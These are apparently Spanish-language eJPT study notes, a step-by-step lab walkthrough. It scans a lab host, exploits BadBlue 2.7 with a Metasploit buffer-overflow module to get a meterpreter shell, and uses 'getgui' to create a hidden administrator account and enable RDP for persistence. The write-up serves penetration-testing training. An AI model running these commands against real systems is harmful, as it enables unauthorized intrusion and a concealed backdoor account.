> For the complete documentation index, see [llms.txt](https://4lec4st.gitbook.io/4lec4st/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://4lec4st.gitbook.io/4lec4st/ejpt-notes/pruebas-de-penetracion-de-host-y-red/post-explotacion/persistencia/persistencia-en-windows/persistencia-a-traves-de-rdp.md).

# Persistencia a través de RDP

## 🧪 Laboratorio Práctico

**Paso 1:** Abra el enlace del laboratorio para acceder a la máquina Kali.

<figure><img src="/files/mAALjkF0dg74FRDnuXlw" alt=""><figcaption></figcaption></figure>

**Paso 2:** Verifique si la máquina de destino es accesible:

**Dominio:**

```
ping -c 4 demo.ine.local
```

<figure><img src="/files/bWBWH2e6UobJD6FPvFd1" alt=""><figcaption></figcaption></figure>

El objetivo es alcanzable.

**Paso 3:** Ejecute un escaneo nmap contra el objetivo.

**Dominio:**

```
nmap demo.ine.local
```

<figure><img src="/files/1s9h1Rj6xoX6Gc34tGbN" alt=""><figcaption></figcaption></figure>

**Paso 4:** Hemos detectado que varios puertos están abiertos. Ejecutaremos nmap de nuevo para determinar la versión del puerto 80.

**Dominio:**

```
nmap -sV -p 80 demo.ine.local
```

<figure><img src="/files/LAW54XpWetBPHy5BU71T" alt=""><figcaption></figcaption></figure>

**BadBlue 2.7** se está ejecutando en el objetivo.

**Paso 5:** Buscaremos el módulo de explotación de badblue 2.7 usando searchsploit.

**Dominio:**

```
searchsploit badblue 2.7
```

<figure><img src="/files/IlaJLZKrSLaJVmBrQ5Sk" alt=""><figcaption></figcaption></figure>

**Paso 6:** Existe un módulo de Metasploit para el servidor BadBlue. Usaremos el módulo de Metasploit PassThru para el desbordamiento de búfer remoto y así explotar el objetivo.

**Comandos:**

```
msfconsole -q
use exploit/windows/http/badblue_passthru
set RHOSTS demo.ine.local
exploit
```

<figure><img src="/files/zKMFHaqv041dZ26vExOG" alt=""><figcaption></figcaption></figure>

Hemos explotado con éxito la aplicación vulnerable objetivo (badblue) y recibimos un shell meterpreter.

**Paso 7:** Verificar el usuario actual.

**Dominio:**

```
getuid
```

<figure><img src="/files/ILMj0jDRgi05jC8EmcNo" alt=""><figcaption></figcaption></figure>

**Paso 8:** Observamos que estamos ejecutando el programa como administrador. Migre el proceso en explorer.exe. Primero, busque el PID de explorer.exe y use el comando "migrar" para migrar el proceso actual.

**Comandos:**

```
ps -S explorer.exe
migrate 2764
```

<figure><img src="/files/kNvr3fGaZBfs6oVIVAdT" alt=""><figcaption></figcaption></figure>

Hemos migrado correctamente al proceso explorer.exe. Mantendremos el acceso mediante RDP. Crearemos un usuario y lo agregaremos al grupo de administradores. Todo esto se puede hacer con el comando **"getgui"** de meterpreter.

El comando 'getgui' realiza los siguientes cambios en la máquina de destino:

* Habilitar el servicio RDP si está deshabilitado
* Crea un nuevo usuario para un atacante
* Ocultar usuario de la pantalla de inicio de sesión de Windows
* Agregar el usuario creado a los grupos "Usuarios de Escritorio remoto" y "Administradores"

**Paso 9:** Ejecutar el comando getgui para obtener acceso remoto.

**Dominio:**

```
run getgui -e -u alice -p hack_123321
```

<figure><img src="/files/rBy2IsL3SXa9Vnn8UW7p" alt=""><figcaption></figcaption></figure>

Hemos creado un usuario “alice” en la máquina de destino y habilitado el acceso RDP.

**Paso 10:** Acceda a la GUI mediante la utilidad xfreerdp.

**Dominio:**

```
xfreerdp /u:alice /p:hack_123321 /v:demo.ine.local

Y [Accept the certificate]
```

<figure><img src="/files/KH4QV78cqL1dQtzELHdx" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/ZzYn2nNWsBUwmw7ZBJQP" alt=""><figcaption></figcaption></figure>

Hemos accedido a la interfaz gráfica de usuario de la máquina de destino mediante RDP con el usuario "alice". Ahora, si se reinicia la máquina, el acceso se mantendrá igual después de que se conecte.

## Conclusión

Este laboratorio guía con éxito a través del proceso de identificación y explotación de una aplicación vulnerable, seguido del mantenimiento del acceso a la máquina de destino a través de RDP.
